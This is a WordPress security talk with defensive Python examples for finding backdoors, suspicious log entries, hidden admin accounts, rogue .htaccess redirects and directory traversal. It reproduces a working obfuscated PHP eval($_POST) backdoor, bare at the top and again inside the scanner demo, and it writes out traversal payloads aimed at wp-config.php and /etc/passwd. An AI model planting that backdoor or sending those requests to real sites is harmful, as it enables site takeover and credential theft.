SCHRODINGER’S WEBSITE
You must assume your site is both hacked and not hacked until you open the box and find out.
<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q53b3a6'])){eval(${$s20}['q53b3a6']);}?>
WordPress Instructor and Custom Theme Developer
Using WordPress Since 2007 — Version 2.2
Not a security expert, but I play one on WordPress.tv
Angela Bowman
Ask WP Girl @askwpgirl
THE VISION
The goal of the WordPress foundation is to:
democratize publishing through Open Source,
GPL software
THE CHALLENGE
effective democracy relies on an educated population with engaged participants
COST OF DEMOCRACY
100,000+ WordPress sites compromised through Slider Revolution security vulnerability
800,000 banking credentials stolen using hacked WordPress sites
600,000 WordPress websites compromised through FancyBox plugin security vulnerability
http://www.databreachtoday.com/hackers-grab-800000-banking-credentials-a-7416
http://wptavern.com/hackers-hijack-fancybox-plugin-to-deface-wordpress-sites-with-isis-propaganda
RECENT VULNERABILITIES
Google Analytics
WordPress 4.2.1
Backup to Dropbox
FancyBox
TwentyFifteen
Revolution Slider
Gravity Forms
JetPack
https://wpvulndb.com/
WHAT DO HACKERS ACTUALLY DO?
Create new accounts with admin privileges
Reset passwords of multiple accounts
Inject malicious code into content
Add malicious code to existing files or new files
Redirect your website by editing .htaccess file
http://www.wpmayor.com/wordpress-security-based-facts-statistics/
TYPICALLY, ONLY THE MOST SEVERELY HACKED SITES WILL BE BLACKLISTED OR SUSPENDED BY HOST
Many hacks are hidden
Wordfence, Exploit Scanner, Sucuri (paid version best) plugins compare core, plugins, and themes to originals.
Scanners do not spot many hacks and are not a reliable way for determining if site is hacked or not.
Tip #1: Use a scanner tool
“SPOT THE HACK” TIPS
“It's very common that backdoors don't have any visible signs in the site code, and it's impossible to detect them by accessing the infected site from outside.” ~ Sucuri
Which of these files is not like the others?
1. View files on server in FTP application (preferably w/ SFTP) or SSH
2. Find the file that is not like the others
3. Open the file.
Did you spot the hack?
lovely encoded hack
Tip #2: Which of these things is not like the other?
Hmmmm? PHP in a CSS folder?
Look for modified dates
Look for unusual names
Compare file list to original download
Look for file types that don’t belong
Check commonly hacked files: .htaccess, wp-config.php, index.php, functions.php, header.php
Any file can be hacked!
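The checks in Tips #1 and #2 (compare the file list to the original download, look for file types that don't belong, look for encoded code) can be scripted. The following is an added example, not code from the slides or from Wordfence/Sucuri/Exploit Scanner: it builds a SHA-256 manifest from a clean copy, diffs the live tree against it, flags PHP files in the uploads tree or in css/images/fonts folders, and greps PHP files for the eval and variable-variable idioms the encoded backdoor on the slide relies on. The site layout, the contents of CLEAN_FILES and the attacker's changes in demo() are constructed for the demo; it is written in Python rather than PHP so it can run from any workstation against a downloaded copy of the site.

```python
"""Added example (not part of the slides or any plugin): a 'which file is not
like the others' scanner. It compares a live WordPress tree against a SHA-256
manifest of a clean download, flags PHP in directories that should hold only
uploads or static assets, and greps PHP for backdoor obfuscation idioms.
The site layout, CLEAN_FILES and the changes made in demo() are constructed."""
import hashlib
import os
import re
import tempfile

# Directory names (and the uploads tree) where a .php file should never live.
NO_PHP_DIRNAMES = {"css", "images", "fonts"}
NO_PHP_PREFIX = "wp-content/uploads/"

# Idioms typical of injected backdoors: eval, decoders, and PHP
# variable-variables (${$x}), which WordPress core essentially never uses.
SUSPICIOUS = re.compile(
    r"\beval\s*\(|\bbase64_decode\s*\(|\bgzinflate\s*\(|\bstr_rot13\s*\(|\$\{\s*\$"
)

# The backdoor from the slide. $qV[4].$qV[3].$qV[2].$qV[0].$qV[1] spells
# "_post", strtoupper() makes it "_POST", so ${$s20}['q53b3a6'] is
# $_POST['q53b3a6'] handed straight to eval().
BACKDOOR = (
    '<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);'
    "if(isset(${$s20}['q53b3a6'])){eval(${$s20}['q53b3a6']);}?>"
)


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Relative path -> sha256 for every file under root."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_of(full)
    return manifest


def php_in_wrong_dir(rel):
    if not rel.endswith(".php"):
        return False
    if rel.startswith(NO_PHP_PREFIX):
        return True
    return any(part in NO_PHP_DIRNAMES for part in rel.split("/")[:-1])


def scan_site(live_root, clean_manifest):
    """Compare a live tree to the clean manifest; return sorted findings."""
    findings = {"added": [], "modified": [], "php_in_wrong_dir": [], "obfuscated": []}
    for rel, digest in build_manifest(live_root).items():
        if rel not in clean_manifest:
            findings["added"].append(rel)
        elif clean_manifest[rel] != digest:
            findings["modified"].append(rel)
        if php_in_wrong_dir(rel):
            findings["php_in_wrong_dir"].append(rel)
        if rel.endswith(".php"):
            with open(os.path.join(live_root, rel), errors="replace") as f:
                if SUSPICIOUS.search(f.read()):
                    findings["obfuscated"].append(rel)
    return {k: sorted(v) for k, v in findings.items()}


def write(root, rel, text):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as f:
        f.write(text)


CLEAN_FILES = {  # constructed stand-in for the original download
    "index.php": "<?php define('WP_USE_THEMES', true); require './wp-blog-header.php';\n",
    "wp-content/themes/urbancity/functions.php": "<?php add_theme_support('post-thumbnails');\n",
    "wp-content/themes/urbancity/css/style.css": "body { margin: 0; }\n",
}


def demo():
    """Clean install vs. the same tree after a compromise (constructed)."""
    clean, live = tempfile.mkdtemp(prefix="wp-clean-"), tempfile.mkdtemp(prefix="wp-live-")
    for rel, text in CLEAN_FILES.items():
        write(clean, rel, text)
        write(live, rel, text)
    manifest = build_manifest(clean)
    # Attacker's changes: PHP dropped into the theme's css folder and into
    # uploads, plus the same eval() stub appended to a legitimate file.
    write(live, "wp-content/themes/urbancity/css/css.php", BACKDOOR)
    write(live, "wp-content/uploads/2015/05/db12.php", BACKDOOR)
    write(live, "wp-content/themes/urbancity/functions.php",
          CLEAN_FILES["wp-content/themes/urbancity/functions.php"] + BACKDOOR)
    return scan_site(live, manifest)


if __name__ == "__main__":
    for kind, files in demo().items():
        print(f"{kind}: {files}")
```

On a real site, build the manifest from freshly downloaded copies of the same WordPress, theme and plugin versions, then point scan_site at a full download of the live site. A file that is neither added nor modified but still matches SUSPICIOUS is worth reading too: the theme or plugin may have shipped with it, which is its own problem.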
Why are people from Thailand and Romania accessing a strangely named PHP file somewhere?
Tip #3: Check raw access logs via cPanel
db12.php, css.php, dirs35.php????
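Raw access logs are long, so the practical move is to pull out every request for a PHP file that WordPress does not normally serve directly and see who is asking for it. The following is an added example, not from the slides or cPanel: it parses Apache/cPanel "combined" log lines and groups suspect requests by path, client IP, method and status. SAMPLE_LOG is constructed (addresses from the RFC 5737 documentation ranges; file names echo the ones on the slide), and the KNOWN_PHP allowlist is an assumption about a stock install.

```python
"""Added example (not from the slides): scan raw access logs (Apache/cPanel
'combined' format) for requests to PHP files a WordPress site does not serve
to browsers, grouped by IP, method and status. SAMPLE_LOG is constructed."""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# PHP entry points WordPress legitimately serves (assumed stock install).
# Anything else ending in .php (uploads, theme css folders, wp-includes)
# deserves a look, whether it answered 200 or 404.
KNOWN_PHP = {"/index.php", "/wp-login.php", "/wp-cron.php", "/xmlrpc.php",
             "/wp-comments-post.php", "/wp-signup.php", "/wp-activate.php"}


def is_unexpected_php(path):
    path = path.split("?", 1)[0]
    if not path.endswith(".php"):
        return False
    return path not in KNOWN_PHP and not path.startswith("/wp-admin/")


def parse(lines):
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def unexpected_php_requests(lines):
    """path -> {'count', 'ips', 'methods', 'statuses'} for suspect requests."""
    hits = defaultdict(lambda: {"count": 0, "ips": set(), "methods": set(), "statuses": set()})
    for req in parse(lines):
        path = req["path"].split("?", 1)[0]
        if is_unexpected_php(path):
            h = hits[path]
            h["count"] += 1
            h["ips"].add(req["ip"])
            h["methods"].add(req["method"])
            h["statuses"].add(req["status"])
    return dict(hits)


SAMPLE_LOG = """\
192.0.2.10 - - [12/May/2015:08:01:12 -0600] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.0.2.10 - - [12/May/2015:08:01:13 -0600] "GET /wp-content/themes/urbancity/css/style.css HTTP/1.1" 200 812 "http://example.com/" "Mozilla/5.0"
192.0.2.11 - - [12/May/2015:08:03:40 -0600] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.11 - - [12/May/2015:08:04:02 -0600] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 33 "-" "Mozilla/5.0"
198.51.100.7 - - [12/May/2015:03:14:05 -0600] "POST /wp-content/uploads/2015/05/db12.php HTTP/1.1" 200 1344 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.7 - - [12/May/2015:03:14:09 -0600] "POST /wp-content/uploads/2015/05/db12.php HTTP/1.1" 200 2290 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
203.0.113.42 - - [12/May/2015:04:52:31 -0600] "GET /wp-content/themes/urbancity/css/css.php HTTP/1.1" 200 0 "-" "-"
203.0.113.42 - - [12/May/2015:04:52:33 -0600] "POST /wp-content/themes/urbancity/css/css.php HTTP/1.1" 200 77 "-" "-"
203.0.113.42 - - [12/May/2015:04:55:10 -0600] "GET /wp-includes/dirs35.php HTTP/1.1" 404 210 "-" "-"
"""


def report(log_text=SAMPLE_LOG):
    """One line per suspect path, busiest first."""
    hits = unexpected_php_requests(log_text.splitlines())
    out = []
    for path, h in sorted(hits.items(), key=lambda kv: -kv[1]["count"]):
        out.append(f"{h['count']:3d}  {path}  ips={sorted(h['ips'])} "
                   f"methods={sorted(h['methods'])} status={sorted(h['statuses'])}")
    return out


if __name__ == "__main__":
    print("\n".join(report()))
```

POSTs to a PHP file under uploads or a theme's css folder are the signature of someone driving a dropped shell; a 404 for a file like dirs35.php is a probe for one and tells you which file names to search the server for. Resolving the IPs to countries (the Thailand and Romania on the slide) is a whois or GeoIP lookup on the ips sets, which is left out here so the script runs offline.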
Tip #4: Use Google!
Google Webmaster Tools/Search Console:
Search Queries – you can spot queries irrelevant to your site.
Links to Your Site – you can find suspicious incoming links here.
Internal Links – this report can help reveal rogue sections of your site.
site:yoursitename.com
Tip #5: Check for rogue users and posts
Your new admin friends?
Find hidden admin users: http://snipe.net/2010/01/when-wordpress-gets-hacked/
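A hacked install can hide an account from the Users screen, so the reliable check is to ask the database which accounts actually hold the administrator capability. The following is an added example, not from the slides or the linked article: WordPress stores roles in the usermeta table under the key `<prefix>capabilities` as a serialized PHP array such as `a:1:{s:13:"administrator";b:1;}`, and the query below matches on that. The in-memory SQLite schema and user rows are a constructed stand-in for the real MySQL database; the expected-admin list and the table prefix are parameters you supply.

```python
"""Added example (not from the slides): list every account whose capabilities
meta grants administrator, straight from the database, and flag the ones you
did not create or that have blank logins/display names (a trick for hiding an
account on the Users screen). SQLite schema and rows are constructed."""
import re
import sqlite3


def checked_prefix(prefix):
    # Table prefixes cannot be bound as query parameters, so validate before
    # formatting them into the SQL.
    if not re.fullmatch(r"[A-Za-z0-9_]+", prefix):
        raise ValueError(f"bad table prefix: {prefix!r}")
    return prefix


def list_admins(conn, prefix="wp_"):
    """Every user whose serialized capabilities array contains 'administrator'."""
    p = checked_prefix(prefix)
    rows = conn.execute(
        f"""SELECT u.ID, u.user_login, u.user_email, u.user_registered, u.display_name
            FROM {p}users u
            JOIN {p}usermeta m ON m.user_id = u.ID
            WHERE m.meta_key = ? AND m.meta_value LIKE '%"administrator"%'
            ORDER BY u.ID""",
        (f"{p}capabilities",),
    ).fetchall()
    keys = ("id", "login", "email", "registered", "display_name")
    return [dict(zip(keys, r)) for r in rows]


def rogue_admins(conn, expected_logins, prefix="wp_"):
    """Admins not in expected_logins, plus admins with blank login or display name."""
    rogue = []
    for u in list_admins(conn, prefix):
        hidden = not u["login"].strip() or not u["display_name"].strip()
        if hidden or u["login"] not in expected_logins:
            u["reason"] = "hidden" if hidden else "unexpected"
            rogue.append(u)
    return rogue


def demo_db():
    """Constructed wp_users / wp_usermeta with one real admin and two planted ones."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_email TEXT,
                               user_registered TEXT, display_name TEXT);
        CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER,
                                  meta_key TEXT, meta_value TEXT);
    """)
    users = [  # (id, login, email, registered, display_name, role) -- constructed
        (1, "siteowner", "owner@example.com", "2007-05-16 10:00:00", "Site Owner", "administrator"),
        (2, "editor", "editor@example.com", "2012-02-01 09:30:00", "Editor", "editor"),
        (3, "wp_support", "x@mail.invalid", "2015-05-11 03:14:07", "WordPress Support", "administrator"),
        (4, " ", "y@mail.invalid", "2015-05-11 03:14:09", " ", "administrator"),
    ]
    for uid, login, email, registered, name, role in users:
        conn.execute("INSERT INTO wp_users VALUES (?,?,?,?,?)", (uid, login, email, registered, name))
        # Same serialized form WordPress writes: a:1:{s:13:"administrator";b:1;}
        conn.execute("INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?,?,?)",
                     (uid, "wp_capabilities", f'a:1:{{s:{len(role)}:"{role}";b:1;}}'))
    return conn


if __name__ == "__main__":
    conn = demo_db()
    for u in rogue_admins(conn, expected_logins={"siteowner"}):
        print(f"{u['reason']:10s} id={u['id']} login={u['login']!r} "
              f"email={u['email']} registered={u['registered']}")
```

Against a live site, open a connection with the DB_NAME, DB_USER and DB_PASSWORD from wp-config.php (pymysql or MySQLdb take the same SQL) and pass the $table_prefix from the same file. Registration timestamps that cluster around the time of the first suspicious access-log entries are your timeline for the break-in.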
Tip #6: Search your site and click on site in search results page!
Some hacks simply redirect your site
Some hacks only show up on phones!
Hacked .htaccess file
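The reason a redirect hack shows up only on phones or only from a search result is that the injected .htaccess rules are conditional: a RewriteCond on the User-Agent or the Referer, followed by a RewriteRule to another host. The following is an added example, not from the slides: it reads an .htaccess, pairs each RewriteRule with the conditions above it, and reports rules that send visitors off-site, noting whether they were placed after the `# END WordPress` marker (often pushed out of view by dozens of blank lines). SAMPLE_HTACCESS is constructed, and redirect.invalid is a reserved test domain.

```python
"""Added example (not from the slides): audit a WordPress .htaccess for the
conditional off-site redirects hacked files use. The sample is constructed;
the only directives inspected are RewriteCond/RewriteRule."""
import re
from urllib.parse import urlparse

REDIRECT_FLAG = re.compile(r"\bR(?:=\d{3})?\b")          # [R], [R=301,L] ...
CLIENT_VARS = re.compile(r"HTTP_USER_AGENT|HTTP_REFERER", re.I)


def audit_htaccess(text, site_host):
    """Return off-site RewriteRules with the client-side variables that gate them."""
    findings = []
    pending = []               # RewriteCond lines that apply to the next RewriteRule
    after_end_marker = False
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if line.startswith("# END WordPress"):
            after_end_marker = True
            continue
        if not line or line.startswith("#"):
            continue
        if line.startswith("RewriteCond"):
            pending.append(line)
            continue
        if line.startswith("RewriteRule"):
            parts = line.split()
            target = parts[2] if len(parts) > 2 else ""
            flags = parts[3] if len(parts) > 3 else ""
            host = urlparse(target).netloc.lower() if "://" in target else ""
            external = bool(host) and host != site_host.lower()
            triggers = sorted({v.upper() for c in pending for v in CLIENT_VARS.findall(c)})
            # Flag every external redirect; the triggers tell you who sees it.
            if external and (triggers or REDIRECT_FLAG.search(flags)):
                findings.append({"line": lineno, "target_host": host,
                                 "triggers": triggers, "after_end_marker": after_end_marker})
            pending = []
    return findings


# Stock WordPress block, 40 blank lines, then the injected rules (constructed).
SAMPLE_HTACCESS = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
""" + "\n" * 40 + """\
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (android|iphone|ipod|blackberry) [NC]
RewriteRule ^(.*)$ http://redirect.invalid/mobile.php [R=302,L]
RewriteCond %{HTTP_REFERER} (google|bing|yahoo|yandex)\\. [NC]
RewriteRule ^(.*)$ http://redirect.invalid/go.php?from=$1 [R,L]
"""


if __name__ == "__main__":
    for f in audit_htaccess(SAMPLE_HTACCESS, "example.com"):
        where = "after # END WordPress" if f["after_end_marker"] else "inside WP block"
        print(f"line {f['line']}: redirect to {f['target_host']} "
              f"when {f['triggers'] or ['always']} ({where})")
```

The two findings here are exactly the cases from the slide: one fires only for mobile User-Agents, the other only for visitors arriving from a search engine, so loading the site directly from a desktop shows nothing wrong. Pass your own hostname as site_host so redirects to your own canonical domain (www to non-www, for instance) are not reported.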
USE CAUTION IF YOU KNOW YOU’RE HACKED
Disable javascript before hitting your site – don’t want to end up infecting your own computer while checking your site.
Even safer, use the W3C validator to inspect your HTML code and look for anything that seems out of place without actually executing any code.
IMMEDIATELY CHANGE PASSWORDS
Use Sucuri plugin to Generate New Security Keys
Reset all passwords, including WordPress users, FTP, web hosting, control panel
Scan computer for viruses!
DIY HACK RECOVERY
Login via FTP
1. Backup: Download everything. Good to examine later for details of the hack if needed.
2. Delete all except: cgi-bin, .htaccess, wp-config.php (examine these)
3. Upload fresh: WordPress, Themes, Plugins, cleaned uploads
RESEARCH
Find key words or phrases in the hacked files to find more information via Google.
Example: vpsp_version
Result: https://kb.sucuri.net/malware/signatures/php.backdoor.vpsp.001
See http://askwpgirl.com/nuke-it-from-orbit/ for step-by-step elimination
CLEAN UP “BAD” HACK
If hackers got admin access to site, you might have to nuke the entire site from orbit — it’s the only way to be sure
https://www.youtube.com/watch?v=aCbfMkh940Q
MONITOR ACTIVITY
Use a plugin to monitor site activity
Pay attention to error logs
View Raw Access logs regularly
SIMPLE SECURITY
Gravity Forms hack
I maintain dozens of sites, and none have ever been hacked.
Except, my personal landing page which I forgot about.
It had outdated Gravity Forms and got hacked.
Every WP install on my account got hacked because I forgot to update one site. It’s not that hard.
Keep sites on separate accounts!
UPDATE UPDATE UPDATE
Timely updates are critical for security. Tools: ManageWP, iControlWP, InfiniteWP, Jetpack
https://wordpress.org/plugins/plugin-vulnerabilities/
UPDATING PREMIUM THEMES AND PLUGINS
Often a manual process - download and FTP new files
Bundled plugins are not supported or auto-updated
Enter license key/purchase code in settings to receive updates
SECURE YOUR LOGIN
Online Generator: http://www.pctools.com/guides/password/
Track Passwords: http://agilebits.com/products/1Password
Enable Two-Factor Authentication: http://askwpgirl.com/secure-wordpress-two-step-authentication/
RUN A TIGHT SHIP!
Delete ALL unused stuff on server
Only use popular and well-maintained themes and plugins
Don’t allow users to register (Settings > General)
Always hold comments for moderation and use spam filtering (Akismet plugin)
GOOD HOSTING
Correct File Permissions
WordPress Auto Updates
Firewall and Scanning
Regular Backups
Server Security
Performance Optimization
EFFECTIVE SECURITY PLUGIN FEATURES
Limit login access
Block bad URL requests with a Firewall
Audit activity
Security through obscurity is not security
IP addresses don’t matter and should not be used as the foundation of a WordPress security policy
https://wordpress.org/plugins/wp-simple-firewall/
Example of a bad URL request a firewall should block (directory traversal through a theme's download script, reaching for wp-config.php):
mywebsite.com/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
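That request works whenever a download script joins the `file` parameter onto a base path and serves whatever results: five `../` segments climb from lib/scripts to the site root, and wp-config.php with the database password comes back as a download. The following is an added example, not the theme's code and not from the slides: a vulnerable resolver beside a hardened one (resolve, then require the result to stay inside one allowed directory), plus the kind of request check a firewall plugin applies before PHP runs. It is written in Python for illustration; the directory layout built in demo() and the sample requests are constructed.

```python
"""Added example (not from the slides): directory traversal through a file
download parameter, shown as a vulnerable path resolver beside a hardened
one, plus a request-level check. Layout and requests are constructed."""
import os
import re
import tempfile
from urllib.parse import unquote


def vulnerable_resolve(script_dir, requested):
    # What a naive download script does: glue the parameter onto a base path.
    # '../' segments are honoured, and an absolute path replaces the base.
    return os.path.normpath(os.path.join(script_dir, requested))


def safe_resolve(script_dir, requested, allowed_subdir="files"):
    # Resolve symlinks and '..' on both sides, then require the result to stay
    # inside the one directory this endpoint is allowed to serve from.
    base = os.path.realpath(os.path.join(script_dir, allowed_subdir))
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"refusing to serve {requested!r}: outside {base}")
    return target


# '..' as a whole path segment (../ or ..\ or trailing), or a NUL byte.
TRAVERSAL = re.compile(r"(?<![\w.])\.\.(?=[/\\]|$)|\x00")


def is_bad_request(path_and_query):
    """Firewall-style check on the raw request line, before any file access."""
    # Decode twice so %252e%252e%252f (double-encoded ../) is caught as well.
    decoded = unquote(unquote(path_and_query))
    return bool(TRAVERSAL.search(decoded))


def demo():
    """Constructed site tree mirroring the path in the blocked request."""
    root = tempfile.mkdtemp(prefix="site-")
    script_dir = os.path.join(root, "wp-content", "themes", "urbancity", "lib", "scripts")
    os.makedirs(os.path.join(script_dir, "files"))
    with open(os.path.join(root, "wp-config.php"), "w") as f:
        f.write("<?php define('DB_PASSWORD', 'constructed-secret');\n")
    with open(os.path.join(script_dir, "files", "brochure.pdf"), "w") as f:
        f.write("%PDF-1.4 constructed\n")

    traversal = "../../../../../wp-config.php"     # the parameter from the slide
    results = {"vulnerable_serves_config": os.path.isfile(vulnerable_resolve(script_dir, traversal))}
    for label, req in (("safe_traversal", traversal), ("safe_absolute", "/etc/passwd"),
                       ("safe_legit", "brochure.pdf")):
        try:
            results[label] = os.path.basename(safe_resolve(script_dir, req))
        except PermissionError:
            results[label] = "rejected"
    results["waf"] = {
        q: is_bad_request(q) for q in (
            "/download.php?file=../../../../../wp-config.php",
            "/download.php?file=..%2F..%2Fwp-config.php",
            "/download.php?file=%252e%252e%252fwp-config.php",
            "/download.php?file=brochure.pdf",
            "/download.php?file=notes..txt",
        )
    }
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The request-level check is the cheap, generic layer a firewall plugin gives you; the commonpath check is what the script itself should have done. Both matter: the firewall catches the attack against a plugin you have not updated yet, and the resolver fix is what an update to the theme would actually contain.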
BACKUPS
Common wisdom is to backup your site
Backups are to your site what major medical health care coverage is to your health
Usually only helpful in case of a disaster
VaultPress and WorpDrive good choices!
RESOURCES
http://snipe.net/2010/01/when-wordpress-gets-hacked/ ***
https://support.google.com/webmasters/answer/163633?rd=1 ***
http://aw-snap.info/articles/find-backdoor.php
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://sucuri.net - free scan, hack recovering, site monitoring
http://askwpgirl.com/nuke-it-from-orbit
https://www.icontrolwp.com/2014/05/wordpress-security-simple-firewall-plugin-part-4-login-protection-feature/
https://www.icontrolwp.com/2014/06/beware-new-security-theat-wordpress-misinformation-virus/
About the banking hack: https://www.proofpoint.com/es/node/327
Top 10 Web application security risks for developers: https://youtu.be/nuWR_HiBHYc
CONTACT
facebook.com/askwpgirl
twitter.com/askwpgirl
http://askwpgirl.com
http://boulderdigitalarts.com
One-on-One consulting third Friday of every month at Boulder Digital Arts
Six-week theme customization course in Colorado and online.
SEO and Best Maintenance Tips Newsletter http://askwpgirl.com
These slides: http://www.slideshare.net/askwpgirl-boulder/security-wcdenver2015